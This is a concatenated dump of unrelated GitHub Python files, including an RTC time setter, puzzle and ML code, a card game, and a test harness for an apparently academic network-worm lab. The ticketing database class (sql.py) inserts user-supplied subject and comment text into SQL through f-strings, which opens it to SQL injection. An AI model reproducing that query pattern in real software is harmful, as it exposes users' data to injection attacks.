app.run(debug=True)","repo_name":"ClodaghMurphy/dataRepresentationProject","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25775566836","text":"#!/usr/bin/env python\n#\n# Test SDL_DS3231\n# John C. Shovic, SwitchDoc Labs\n# 08/03/2014\n#\n#\n\n# imports\n\nimport sys\nimport time\nimport datetime\nimport random \nimport ds3231\nimport os\nimport ntplib\n\n\n\nwhile True:\n try:\n rtc = ds3231.SDL_DS3231(1, 0x68)\n if(len(sys.argv) > 1):\n if(sys.argv[1] == '-i'):\n print('Using Internet to set time')\n client=ntplib.NTPClient()\n response = client.request('pool.ntp.org')\n dateToSet = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(response.tx_time))\n else:\n print('wrong input')\n sys.exit()\n else:\n print('manually input to set time')\n print()\n x = input(\"Please input date and time (format: 2022-12-30 16:59:59): \")\n print()\n f = \"%Y-%m-%d %H:%M:%S\"\n datetime.datetime.strptime(x,f)\n dateToSet = x\n\n command = 'sudo date -s \\\"'+dateToSet+'\\\"'\n# print(command)\n stream = os.popen(command)\n time.sleep(1)\n rtc.write_now()\n time.sleep(0.5)\n print(\"Time Setup Completed! RTC Configured...\")\n break\n except Exception as e:\n print(e)\n print(\"This is the incorrect format, must be in this format (format: 2022-12-30 16:59:59)\")","repo_name":"adnan6336/RaspberryPiCodes","sub_path":"RTCCode/setRTCTime.py","file_name":"setRTCTime.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38239509762","text":"import math\n\nfrom util import *\nfrom util import Grid as g\nimport itertools as it\nimport re\n\nh = Helper(18)\n\ninp = h.get_input_list()\n\n\ndef parse_numb(s):\n s = s.strip(\" \")\n\n depth = 0\n for i, c in enumerate(s):\n if c == \"[\":\n depth += 1\n elif c == \"]\":\n depth -= 1\n elif depth == 1 and c == \",\":\n s = s[:i] + \"#\" + s[i + 1:]\n s = s[1:-1]\n elements = s.split(\"#\")\n\n out = []\n for element in elements:\n try:\n out.append(int(element))\n except ValueError:\n out.append(parse_numb(element))\n return out\n\n\ndef add_nums(n1, n2):\n out = [n1.copy(), n2.copy()]\n\n while True:\n exploded = True\n while exploded:\n _, _, exploded = handle_explosion(out, 0)\n\n if not handle_split(out):\n break\n\n return out\n\n\ndef handle_explosion(arr: list, depth):\n prop_l, prop_r = None, None\n exploded = False\n i = 0\n for i, element in enumerate(arr):\n if type(element) == list:\n if depth == 3:\n arr[i] = 0\n prop_l, prop_r = element[0], element[1]\n exploded = True\n break\n else:\n prop_l, prop_r, exploded = handle_explosion(element, depth + 1)\n if exploded:\n break\n\n if prop_l is not None:\n if i - 1 >= 0:\n if type(arr[i - 1]) is int:\n arr[i - 1] += prop_l\n prop_l = None\n else:\n prop_arr = arr[i - 1]\n while True:\n if type(prop_arr[1]) is int:\n prop_arr[1] += prop_l\n prop_l = None\n break\n prop_arr = prop_arr[i]\n\n if prop_r is not None and i + 1 < len(arr):\n if type(arr[i + 1]) is int:\n arr[i + 1] += prop_r\n prop_r = None\n else:\n prop_arr = arr[i + 1]\n while True:\n if type(prop_arr[0]) is int:\n prop_arr[0] += prop_r\n prop_r = None\n break\n prop_arr = prop_arr[0]\n\n return prop_l, prop_r, exploded\n\n\ndef handle_split(arr):\n for i, e in enumerate(arr):\n if type(e) is int:\n if e > 9:\n arr[i] = [math.floor(e / 2), math.ceil(e / 2)]\n return True\n else:\n if handle_split(e):\n return True\n return False\n\n\ndef get_magnitude(arr):\n mag = 0\n\n weights = (3, 2)\n for i, e in enumerate(arr):\n if type(e) is int:\n mag += weights[i] * e\n else:\n mag += weights[i] * get_magnitude(e)\n return mag\n\n\nsum_arr = parse_numb(inp[0])\n\nfor numb in inp[1:]:\n sum_arr = add_nums(sum_arr, parse_numb(numb))\nprint(sum_arr)\n\nh.submit(get_magnitude(sum_arr))\n","repo_name":"NoahMollerstuen/Advent-of-Code","sub_path":"solutions/2021_day18/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26735735437","text":"import math\r\nimport torch\r\ntorch.pi = torch.acos(torch.zeros(1)).item() * 2 # which is 3.1415927410125732\r\nfrom torch import autograd\r\nfrom filing_paths import path_model\r\nimport sys\r\nsys.path.insert(1, path_model)\r\nfrom parameters import m, n, J, delta_t,delta_t_test,delta_t_gen, H_design, B, C, B_mod, C_mod, delta_t_mod, J_mod, H_mod, H_design_inv, H_mod_inv,RotMatrix\r\n\r\nif torch.cuda.is_available():\r\n cuda0 = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc.\r\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\r\nelse:\r\n cuda0 = torch.device(\"cpu\")\r\n print(\"Running on the CPU\")\r\n\r\ndef f_test(x):\r\n \r\n #A = torch.add(torch.einsum('nhw,wa->nh', B, x).T,C)\r\n A = torch.add(torch.reshape(torch.matmul(B, x),(m,m)).T,C)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)\r\n for j in range(1,J+1):\r\n F_add = (torch.matrix_power(A*delta_t_test, j)/math.factorial(j)).to(cuda0)\r\n F = torch.add(F, F_add).to(cuda0)\r\n\r\n return torch.matmul(F, x)\r\n\r\ndef f_gen(x):\r\n\r\n #A = torch.add(torch.einsum('nhw,wa->nh', B, x).T,C)\r\n A = torch.add(torch.reshape(torch.matmul(B, x),(m,m)).T,C)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)\r\n for j in range(1,J+1):\r\n F_add = (torch.matrix_power(A*delta_t_gen, j)/math.factorial(j)).to(cuda0)\r\n F = torch.add(F, F_add).to(cuda0)\r\n\r\n return torch.matmul(F, x)\r\n\r\ndef f(x):\r\n\r\n #A = torch.add(torch.einsum('nhw,wa->nh', B, x).T,C)\r\n A = (torch.add(torch.reshape(torch.matmul(B, x),(m,m)).T,C)).to(cuda0)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)\r\n for j in range(1,J+1):\r\n F_add = (torch.matrix_power(A*delta_t, j)/math.factorial(j)).to(cuda0)\r\n F = torch.add(F, F_add).to(cuda0)\r\n\r\n return torch.matmul(F, x)\r\n\r\ndef h(x):\r\n return torch.matmul(H_design,x).to(cuda0)\r\n #return toSpherical(x)\r\n\r\ndef fInacc(x):\r\n\r\n #A = torch.add(torch.einsum('nhw,wa->nh', B, x).T,C)\r\n A = torch.add(torch.reshape(torch.matmul(B_mod, x),(m,m)).T,C_mod)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)\r\n for j in range(1,J_mod+1):\r\n F_add = (torch.matrix_power(A*delta_t_mod, j)/math.factorial(j)).to(cuda0)\r\n F = torch.add(F, F_add).to(cuda0)\r\n\r\n return torch.matmul(F, x)\r\n\r\ndef fRotate(x):\r\n A = (torch.add(torch.reshape(torch.matmul(B, x),(m,m)).T,C)).to(cuda0)\r\n A_rot = torch.mm(RotMatrix,A) \r\n # Taylor Expansion for F \r\n F = torch.eye(m)\r\n for j in range(1,J+1):\r\n F_add = (torch.matrix_power(A_rot*delta_t, j)/math.factorial(j)).to(cuda0)\r\n F = torch.add(F, F_add).to(cuda0)\r\n\r\n return torch.matmul(F, x)\r\n\r\ndef h_nonlinear(x):\r\n return toSpherical(x)\r\n\r\n\r\ndef f_interpolate(x, n=2):\r\n \r\n for _ in range(n):\r\n A = torch.add(torch.reshape(torch.matmul(B_mod, x),(m,m)).T,C_mod)#.to(dev, non_blocking=True)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)#.to(dev, non_blocking=True)\r\n for j in range(1,J+1):\r\n F_add = torch.matrix_power(A*delta_t/n, j)/math.factorial(j)\r\n F = torch.add(F, F_add)\r\n x = torch.matmul(F, x)\r\n return x\r\n\r\ndef f_interpolate_approx(x, n=2):\r\n\r\n for _ in range(n):\r\n A = torch.add(torch.reshape(torch.matmul(B_mod, x),(m,m)).T,C_mod)#.to(dev, non_blocking=True)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)#.to(dev, non_blocking=True)\r\n for j in range(1,J_mod+1):\r\n F_add = torch.matrix_power(A*delta_t/n, j)/math.factorial(j)\r\n F = torch.add(F, F_add)\r\n x = torch.matmul(F, x)\r\n return x\r\n\r\n\r\ndef hInacc(x):\r\n return torch.matmul(H_mod,x)\r\n #return toSpherical(x)\r\n\r\ndef getJacobian(x, a):\r\n \r\n # if(x.size()[1] == 1):\r\n # y = torch.reshape((x.T),[x.size()[0]])\r\n try:\r\n if(x.size()[1] == 1):\r\n y = torch.reshape((x.T),[x.size()[0]])\r\n except:\r\n y = torch.reshape((x.T),[x.size()[0]])\r\n \r\n if(a == 'ObsAcc'):\r\n g = h\r\n elif(a == 'ModAcc'):\r\n g = f\r\n elif(a == 'ObsInacc'):\r\n g = hInacc\r\n elif(a == 'ModInacc'):\r\n g = fInacc\r\n\r\n Jac = autograd.functional.jacobian(g, y)\r\n Jac = Jac.view(-1,m)\r\n return Jac\r\n\r\ndef toSpherical(cart):\r\n\r\n rho = torch.norm(cart, p=2).view(1,1)\r\n phi = torch.atan2(cart[1, ...], cart[0, ...]).view(1, 1)\r\n phi = phi + (phi < 0).type_as(phi) * (2 * torch.pi)\r\n\r\n theta = torch.acos(cart[2, ...] / rho).view(1, 1)\r\n\r\n spher = torch.cat([rho, theta, phi], dim=0)\r\n\r\n return spher\r\n\r\ndef toCartesian(sphe):\r\n\r\n rho = sphe[0,:]\r\n theta = sphe[1,:]\r\n phi = sphe[2,:]\r\n\r\n x = (rho * torch.sin(theta) * torch.cos(phi)).view(1,-1)\r\n y = (rho * torch.sin(theta) * torch.sin(phi)).view(1,-1)\r\n z = (rho * torch.cos(theta)).view(1,-1)\r\n\r\n cart = torch.cat([x,y,z],dim=0)\r\n\r\n return cart\r\n\r\ndef hInv(y):\r\n return torch.matmul(H_design_inv,y)\r\n #return toCartesian(y)\r\n\r\n\r\ndef hInaccInv(y):\r\n return torch.matmul(H_mod_inv,y)\r\n #return toCartesian(y)\r\n\r\n'''\r\nx = torch.tensor([[1],[1],[1]]).float() \r\nH = getJacobian(x, 'ObsAcc')\r\nprint(H)\r\nprint(h(x))\r\n\r\nF = getJacobian(x, 'ModAcc')\r\nprint(F)\r\nprint(f(x))\r\n'''","repo_name":"KalmanNet/RTSNet_ICASSP22","sub_path":"Simulations/Lorenz_Atractor/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"2"} +{"seq_id":"25834117467","text":"import requests\r\nimport urllib.parse\r\n\r\nclass NewQRLogin:\r\n API_URL = \"https://api.lrtt.icu/secondaryQrCodeLogin.do\"\r\n HEADERS = ['android_lite', 'android', 'ios_ipad', 'ios', 'chrome', 'desktopwin', 'desktopmac']\r\n\r\n def parseLogin(this, loginInfo):\r\n return (loginInfo[\"token\"], loginInfo[\"certificate\"])\r\n\r\n def loginWithQrCode(self, header, certificate=\"\", callback=lambda output: print(output)):\r\n resp = requests.post(self.API_URL + \"/login?\" + urllib.parse.urlencode({\"header\": header, \"certificate\": certificate}))\r\n res = resp.json()\r\n if resp.status_code != 200:\r\n raise Exception(res)\r\n callback(\"Login URL: %s\" % (res[\"url\"]))\r\n\r\n while \"token\" not in res:\r\n resp = requests.post(self.API_URL + res[\"callback\"])\r\n res = resp.json()\r\n if resp.status_code != 200:\r\n raise Exception(res)\r\n\r\n if \"pin\" in res:\r\n callback(\"Input PIN: %s\" % (res[\"pin\"]))\r\n\r\n return res\r\n\r\nif __name__ == \"__main__\":\r\n qrv2 = NewQRLogin()\r\n qrv2.loginWithQrCode(\"android_lite\")\r\n","repo_name":"Gunggung/Gung5","sub_path":"newqr.py","file_name":"newqr.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5393633295","text":"from os import stat\nimport pymysql.cursors\nfrom datetime import date\nimport datetime\nimport sqlite3\n\nfrom models.ticket_model import Ticket\nfrom models.user_model import User\n\nclass Database():\n def __init__(self):\n self.connection = self._get_sql_connection()\n\n def __enter__(self):\n return self\n \n def __exit__(self, exc_type, exc_val, exc_tb):\n self.connection.commit()\n self.connection.close()\n\n def get_ticket_obj(self, ticket):\n t = self._get_ticket(ticket)[0]\n a = self._get_audits(ticket)\n return Ticket(ticket=t, audits=a)\n \n def get_all_open_tickets(self):\n l = []\n tickets = self._get_all_open_tickets()\n for ticket in tickets:\n l.append(Ticket(ticket=ticket))\n return l\n\n def update_or_solve_ticket(self, ticket_id, content, status, assignee_id):\n try:\n if status == \"solve\":\n self._update_ticket(ticket_id, content, assignee_id)\n self._solve_ticket(ticket_id)\n if status == \"update\":\n self._update_ticket(ticket_id, content, assignee_id)\n return 200\n except Exception as e:\n print(e)\n return 500\n\n def create_ticket(self, ticket):\n self._create_ticket(ticket.subject, ticket.content, ticket.user_id)\n\n def get_users(self):\n l = []\n users = self._get_users()\n for user in users:\n l.append(User(user))\n return l\n\n def close_connection(self):\n return self.connection.close()\n \n def _get_sql_connection(self):\n return sqlite3.connect(\"./database/ticketing.db\")\n\n def _get_audits(self, ticket_id):\n try:\n cursor = self.connection.cursor()\n cursor.row_factory = sqlite3.Row\n sql = f\"\"\"select a.*, u.name as user_name from audits a \n join users u on a.assignee_id = u.id\n where a.ticket_id={ticket_id}\n order by created_at desc\"\"\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return result\n\n except Exception as e:\n print(e)\n \n def _get_ticket(self, ticket_id):\n try:\n cursor = self.connection.cursor()\n cursor.row_factory = sqlite3.Row\n sql = f\"select * from tickets where id={ticket_id}\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return result\n\n except Exception as e:\n print(e)\n \n def _get_all_open_tickets(self):\n try:\n cursor = self.connection.cursor()\n cursor.row_factory = sqlite3.Row\n sql = f\"\"\"select t.id, t.subject, t.comment, t.requested_by, t.created_at from tickets t \n left join audits a on t.id = a.ticket_id\n where t.is_solved is not 1\n group by t.id, t.subject, t.comment, t.requested_by, t.created_at\"\"\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return result\n\n except Exception as e:\n print(e)\n\n def _update_ticket(self, ticket_id, content, assignee_id):\n try:\n cursor = self.connection.cursor()\n sql = f\"\"\"insert into audits (ticket_id, comment, assignee_id) values({ticket_id}, \"{content}\", {assignee_id})\"\"\"\n cursor.execute(sql)\n\n except Exception as e:\n print(e)\n\n def _solve_ticket(self, ticket_id):\n try:\n cursor = self.connection.cursor()\n sql = f\"\"\"update tickets set is_solved = 1 where id = {ticket_id}\"\"\"\n cursor.execute(sql)\n\n except Exception as e:\n print(e)\n \n def _get_users(self):\n try:\n cursor = self.connection.cursor()\n cursor.row_factory = sqlite3.Row\n sql = f\"\"\"select * from users\"\"\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return result\n\n except Exception as e:\n print(e)\n \n def _create_ticket(self, subject, content, user_id):\n try:\n cursor = self.connection.cursor()\n sql = f\"\"\"insert into tickets (subject, comment, requested_by) VALUES\n (\"{subject}\", \"{content}\", \"{user_id}\")\"\"\"\n cursor.execute(sql)\n\n except Exception as e:\n print(e)\n","repo_name":"adamjacobsson/ticketing","sub_path":"ticketing_api/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28916833256","text":"import random, threading, time\nfrom .player import Player\nfrom .prince import Prince\nfrom .princess import Princess\nfrom .countess import Countess\nfrom .guard import Guard\nfrom .baron import Baron\nfrom .priest import Priest\nfrom .handmaid import Handmaid\nfrom .king import King\nfrom QlearningEngineV3.AIV3 import AIV3\nfrom QlearningEngineV1.AIV1 import AIV1\nfrom QlearningEngineV3.io import DBAccess\n\ndb = DBAccess()\n\nclass Game(threading.Thread):\n\n \"\"\"\n Class representing a game of two players.\n \"\"\"\n\n def __init__(self,renderer,q):\n threading.Thread.__init__(self)\n self.daemon=True\n self.__q=q\n self.__draw = []\n self.__players = []\n self.__discard = []\n self.__renderer=renderer\n self.__nb_simulation = 1\n self.learning = 0\n self.start()\n\n def getQ(self):\n return self.__q\n def getDraw(self):\n return self.__draw\n def getPlayers(self):\n return self.__players\n def getDiscard(self):\n return self.__discard\n def getRenderer(self):\n return self.__renderer\n\n def run(self):\n \"\"\"Starts and play a game of two player.\"\"\"\n infos=self.__q.get()\n self.__q.task_done()\n self.__q.join()\n num_player=1\n self.__nb_simulation = 1\n self.__renderer.setOneSide(infos[0][1] == 0 and infos[1][1] == 1 or infos[0][1] == 1 and infos[1][1] == 0)\n for info in infos:\n if info[1] == 0:\n self.__players.append(Player(num_player,info[0]))\n else:\n if info[2] == 1:\n self.__players.append(AIV3(num_player,0))\n else:\n self.__players.append(AIV1(num_player,0))\n num_player+=1\n #if(infos[0][2] == 1 or infos[1][2] == 1):\n # self.__renderer.askNbSimu()\n # self.__nb_simulation = int(self.__q.get())\n # self.__q.task_done()\n # self.__q.join()\n random.shuffle(self.__players)\n if not self.__renderer.getSimuMod():\n self.__renderer.displayMessage([\"{0} commence !\".format(self.__players[0].getName())])\n while self.__nb_simulation > 0:\n if self.__renderer.getSimuMod():\n self.__renderer.showNbSimu(self.__nb_simulation)\n while (self.__players[0].getScore() != 7 and self.__players[1].getScore() != 7):\n self.initRound()\n while not self.endRoundCondition():\n self.turn()\n self.endRound()\n winner = self.__players[1]\n looser = self.__players[0]\n if (self.__players[0].getScore() == 7): \n winner = self.__players[0]\n looser = self.__players[1]\n if (callable(getattr(self.__players[0], \"lastUpdate\", None)) or callable(getattr(self.__players[1], \"lastUpdate\", None))) and self.learning == 0:\n db.incrementStat(winner, looser, False)\n else:\n if not self.__renderer.getSimuMod():\n self.__renderer.displayMessage([\"{0} a gagné !\".format(self.__players[1].getName())])\n self.__players[0].setScore(0)\n self.__players[1].setScore(0)\n self.__nb_simulation-=1\n self.__renderer.end()\n \n def turn(self):\n \"\"\"Play a turn, meaning both player play a card.\"\"\"\n for player in self.__players:\n if (not self.endRoundCondition()):\n if not self.__renderer.getSimuMod():\n self.__renderer.swapPlayer(player.getName())\n player.setIsImmune(False)\n player.draw(self.__draw, self.__renderer)\n player.playCard(self)\n if not self.__renderer.getSimuMod():\n self.__renderer.initTurn(self.__players, player, self.__draw)\n\n def initRound(self):\n \"\"\"Initializes __draw, __discard, player's hands and boolean's __players status for a new round.\"\"\"\n #self.__renderer.displayMessage([\"Nouveau round\"])\n self.__draw = [Princess(), Countess(), King(), Prince(), Prince(), Handmaid(), Handmaid(), \n Baron(), Baron(), Priest(), Priest(), Guard(), Guard(), Guard(), Guard(), Guard()]\n random.shuffle(self.__draw)\n self.__discard = [self.__draw.pop(0), self.__draw.pop(0), self.__draw.pop(0)]\n self.swapPlayersOrder()\n if not self.__renderer.getSimuMod():\n self.__renderer.initRound(self.__draw, self.__discard, self.__players)\n p=0\n for player in self.__players:\n hide = False if p == 0 else True\n player.setHand([])\n player.setDiscard([])\n player.setIsImmune(False)\n player.setIsKnockedOut(False)\n if callable(getattr(player, \"setMemorizedOpponentCard\", None)):\n player.setMemorizedOpponentCard(None)\n player.updateRemainingCards(self.__discard)\n if not self.__renderer.getSimuMod():\n if self.__renderer.getOneSide() and not callable(getattr(player,\"getSpecial\",None)):\n hide = False\n player.draw(self.__draw, self.__renderer, hide)\n p+=1\n\n def endRoundCondition(self):\n \"\"\"Return True if the conditions to finish the round if the conditions are gathered.\"\"\" \n for player in self.__players:\n if player.getIsKnockedOut():\n return True\n if not self.__draw:\n return True\n return False\n \n def endRound(self):\n \"\"\"To call at the end of a round, determine the winner and set his score.\"\"\" \n winner = self.__players[0]\n looser = self.__players[1]\n if (self.__players[1].getIsKnockedOut() or self.__players[0].getHand()[0].getValue() > self.__players[1].getHand()[0].getValue() and not self.__players[0].getIsKnockedOut()):\n self.__players[0].setScore(self.__players[0].getScore() + 1)\n elif (self.__players[0].getIsKnockedOut() or self.__players[1].getHand()[0].getValue() > self.__players[0].getHand()[0].getValue() and not self.__players[1].getIsKnockedOut()):\n self.__players[1].setScore(self.__players[1].getScore() + 1)\n winner = self.__players[1]\n looser = self.__players[0]\n elif (self.__players[1].calcTie() > self.__players[0].calcTie()):\n self.__players[1].setScore(self.__players[1].getScore() + 1)\n winner = self.__players[1]\n looser = self.__players[0]\n if callable(getattr(winner, \"lastUpdate\", None)):\n winner.lastUpdate(1)\n if callable(getattr(looser, \"lastUpdate\", None)):\n looser.lastUpdate(-1)\n if (callable(getattr(self.__players[0], \"lastUpdate\", None)) or callable(getattr(self.__players[1], \"lastUpdate\", None))) and self.learning == 0:\n db.incrementStat(winner, looser, True)\n if not self.__renderer.getSimuMod():\n self.__renderer.displayMessage([\"{0} a gagné le round !\".format(winner.getName()),\n \"Scores :\\n{0} : {1}\\n{2} : {3}\".format(self.__players[0].getName(), self.__players[0].getScore(),\n self.__players[1].getName(), self.__players[1].getScore())])\n def swapPlayersOrder(self):\n \"\"\"Swap the order of the players in the list of players to make them play first alternately.\n Swap only if it is not the first round.\n \"\"\" \n if self.__players[0].getScore() != 0 or self.__players[1].getScore() != 0:\n tmp_player = self.__players[0]\n self.__players[0] = self.__players[1]\n self.__players[1] = tmp_player\n","repo_name":"ElMitsuki/LoveLetter","sub_path":"gameEngine/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"26545436950","text":"from datetime import datetime\n\nimport pandas as pd\nimport pybaseball\nfrom pybaseball import statcast\n\nif __name__ == '__main__':\n pybaseball.cache.enable()\n #for i in range(1920,datetime.now().year + 1):\n for i in range(datetime.now().year,datetime.now().year + 1):\n print(i)\n season_df = statcast(start_dt=f'{i}-03-01', end_dt=f'{i}-12-01')\n # season = [game_year]\n #season_df['year'] = pd.DatetimeIndex(season_df['game_date']).year\n season_df['month'] = pd.DatetimeIndex(season_df['game_date']).month\n season_df['day'] = pd.DatetimeIndex(season_df['game_date']).day\n\n min_month = int(season_df['month'].min())\n max_month = int(season_df['month'].max())\n \n for j in range(min_month,max_month+1):\n month = 0\n if j < 10:\n month = f\"0{j}\"\n else:\n month = j\n \n month_df = season_df.loc[season_df['month'] == j]\n \n len_month_df = len(month_df)\n len_month_df = len_month_df // 2\n\n partOne = month_df.iloc[:len_month_df]\n partTwo = month_df.iloc[len_month_df:]\n \n partOne.to_csv(f'gamelogs/{i}_{month}_01_statcast.csv',index=False)\n partTwo.to_csv(f'gamelogs/{i}_{month}_02_statcast.csv',index=False)\n \n #print(season_df)\n","repo_name":"sportsdataverse/sportsdataverse-baseball-data","sub_path":"py_baseball_pbp.py","file_name":"py_baseball_pbp.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"3529579054","text":"#!/usr/bin/env python3\n\nimport argparse\nimport logging\nimport os\nimport re\nimport subprocess\nimport tempfile\nimport time\nimport unittest\nimport json\nimport requests\n\n\ndef create_http_URL(address, header=\"\"):\n return f\"http://{address}/{header}\"\n\n\ndef setup_worm():\n with open(\"../worm_segment/segment.bin\", \"rb\") as file:\n data = file.read()\n\n wormgate_URL = create_http_URL(f\"{args.host}:{args.port}\")\n response = requests.post(\n wormgate_URL + f\"worm_entrance?args={1}/{1}/{args.port}\", data=data\n )\n time.sleep(1)\n\n\ndef kill_worm():\n leader_URL = create_http_URL(f\"{args.host}:{args.port + 1}\")\n print(f\"kill{leader_URL}\")\n response = requests.post(f\"{leader_URL}kill\")\n print(response)\n\n\ndef test_grow_worm():\n full_result = []\n\n wormgate_URL = create_http_URL(f\"{args.host}:{args.port}\")\n leader_URL = create_http_URL(f\"{args.host}:{args.port + 1}\")\n\n for i in range(1):\n for max_segments in range(1, args.size + 1):\n result = {}\n response = requests.post(f\"{leader_URL}set_max_segments/{1}\")\n\n start_time = time.time()\n response = requests.post(f\"{leader_URL}set_max_segments/{max_segments}\")\n end_time = time.time() - start_time\n\n print(f\"grow from 1 to {max_segments} grow_time : {end_time}\")\n response = requests.post(f\"{leader_URL}set_max_segments/{1}\")\n\n result[\"max\"] = max_segments\n result[\"time\"] = end_time\n full_result.append(result)\n\n response = requests.post(f\"{leader_URL}set_max_segments/{1}\")\n with open(\"result/grow.json\", \"w+\") as file:\n json.dump(full_result, file)\n\n\ndef test_kill_worm():\n full_result = []\n\n wormgate_URL = create_http_URL(f\"{args.host}:{args.port}\", \"info\")\n leader_URL = create_http_URL(f\"{args.host}:{args.port + 1}\")\n response = requests.post(f\"{leader_URL}set_max_segments/{args.size}\")\n\n gate_info = requests.get(wormgate_URL, timeout=1).json()\n\n for i in range(3):\n for kill_size in range(2, 11):\n result = {}\n time.sleep(1)\n leader = requests.get(f\"{leader_URL}segment_info\", timeout=1).json()\n start_time = time.time()\n for i in range(1, kill_size):\n gate_URL = create_http_URL(gate_info[\"other_gates\"][i], \"kill_worms\")\n response = requests.post(gate_URL)\n for gate in gate_info[\"other_gates\"]:\n numseg = 0\n while numseg != 1:\n gate_url = create_http_URL(gate, \"info\")\n res = requests.get(gate_url, timeout=1).json()\n numseg = res[\"numsegments\"]\n end_time = time.time() - start_time\n print(f\"kille_size: {kill_size - 1} kill_time : {end_time}\")\n result[\"kill_size\"] = kill_size - 1\n result[\"time\"] = end_time\n full_result.append(result)\n\n response = requests.post(f\"{leader_URL}set_max_segments/{1}\")\n with open(\"result/kill.json\", \"w+\") as file:\n json.dump(full_result, file)\n\n\ndef build_arg_parser():\n parser = argparse.ArgumentParser(prog=\"test_segment.py\")\n\n parser.add_argument(\"-t\", \"--test\", type=int)\n parser.add_argument(\"-c\", \"--host\", type=str)\n parser.add_argument(\"-p\", \"--port\", type=int)\n parser.add_argument(\"-n\", \"--size\", type=int)\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = build_arg_parser()\n global args\n args = parser.parse_args()\n print(args)\n\n setup_worm()\n if args.test == 1:\n test_grow_worm()\n elif args.test == 2:\n test_kill_worm()\n\n kill_worm()\n","repo_name":"ThomasOttestad/Network-worm","sub_path":"test/test_segment.py","file_name":"test_segment.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12725572709","text":"import pandas as pd\nfrom sklearn.metrics import accuracy_score, average_precision_score, f1_score, precision_score, recall_score, \\\n roc_auc_score\n\nfrom abstractions.base_model import BaseModel\nfrom configs.config import categorical_features\nfrom utils.helpers import nominal_normalization\n\n\nclass TrainModel(BaseModel):\n\n def __init__(self, model):\n super().__init__(model)\n\n def preprocess(self, data: pd.DataFrame):\n categoricals = nominal_normalization(data[categorical_features])\n numerical_columns = data.drop(columns=categorical_features)\n return pd.concat([numerical_columns, categoricals],axis=1)\n\n def train(self, x_train: pd.DataFrame, y_train: pd.DataFrame):\n self.model.fit(x_train, y_train.ravel())\n\n def predict(self, X_test: pd.DataFrame) -> pd.DataFrame:\n return self.model.predict(X_test)\n\n def evaluate(self, y_real: pd.DataFrame, y_pred: pd.DataFrame):\n accuracy = accuracy_score(y_real, y_pred)\n average_precision = average_precision_score(y_real, y_pred)\n f1 = f1_score(y_real, y_pred)\n precision = precision_score(y_real, y_pred)\n recall = recall_score(y_real, y_pred)\n roc_auc = roc_auc_score(y_real, y_pred)\n\n label = ['Churn Prediction']\n v1 = [accuracy]\n v2 = [average_precision]\n v3 = [f1]\n v4 = [precision]\n v5 = [recall]\n v6 = [roc_auc]\n\n series = [{'label': 'Accuracy', 'values': v1},\n {'label': 'Average Precision Score', 'values': v2},\n {'label': 'f1 Score', 'values': v3},\n {'label': 'precision_score', 'values': v4},\n {'label': 'Recall Score', 'values': v5},\n {'label': 'Roc Auc Score', 'values': v6}]\n\n return {'labels': label, 'series': series}","repo_name":"MarinosGal/ChurnPrediction","sub_path":"churn_prediction/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"39609198681","text":"import os\nimport random\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom PIL import Image\nfrom torch.utils import data\nfrom tqdm import tqdm\n\nimport network\nimport utils\nfrom metrics import StreamSegMetrics\nfrom utils.configs import get_argparser, get_dataset\nfrom utils.loss import Loss\nfrom utils.train_options import get_input, calc_loss\n\n\ndef validate(opts, model, loader, device, metrics):\n \"\"\"Do validation and return specified samples\"\"\"\n metrics.reset()\n if opts.save_val_results:\n if not os.path.exists('results'):\n os.mkdir('results')\n denorm = utils.Denormalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n img_id = 0\n\n with torch.no_grad():\n for i, (images, labels) in tqdm(enumerate(loader)):\n\n images = images.to(device, dtype=torch.float32)\n labels = labels.to(device, dtype=torch.long)\n\n outputs = model(images)\n preds = outputs.detach().max(dim=1)[1].cpu().numpy()\n targets = labels.cpu().numpy()\n\n metrics.update(targets, preds)\n\n if opts.save_val_results:\n for i in range(len(images)):\n image = images[i].detach().cpu().numpy()\n target = targets[i]\n pred = preds[i]\n\n image = (denorm(image) * 255).transpose(1, 2, 0).astype(np.uint8)\n target = loader.dataset.decode_target(target).astype(np.uint8)\n pred = loader.dataset.decode_target(pred).astype(np.uint8)\n\n 